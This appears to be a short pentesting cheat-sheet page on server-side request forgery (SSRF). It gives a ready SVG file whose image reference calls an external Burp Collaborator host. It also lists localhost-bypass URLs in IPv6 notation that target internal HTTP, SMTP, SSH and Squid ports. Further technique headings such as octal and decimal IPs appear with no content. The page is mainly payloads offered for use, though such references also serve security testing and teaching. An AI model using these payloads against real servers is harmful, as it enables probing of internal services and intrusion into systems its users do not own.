Server Side Request Forgery (SSRF)
Payloads
SSRF in SVG file
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
<image height="200" width="200" xlink:href="http://burpcollaborator.com/image.jpeg" />
</svg>Localhost Bypasses
Using [::]
http://[::]:80/ #HTTP
http://[::]:25/ #SMTP
http://[::]:22/ #SSH
http://[::]:3128/ #SQUID
http://0000::1:80/ #HTTP
http://0000::1:25/ #SMTP
http://0000::1:22/ #SSH
http://0000::1:3128/ #SQUIDUsing a domain redirection
Using CIDR
Using decimal IP location
Using Octal IP
Using IPv6/IPv4 Address Embedding
Using malformed urls
Using weird address
Using enclosed alphanumerics
Against a weak parser
References
Last updated
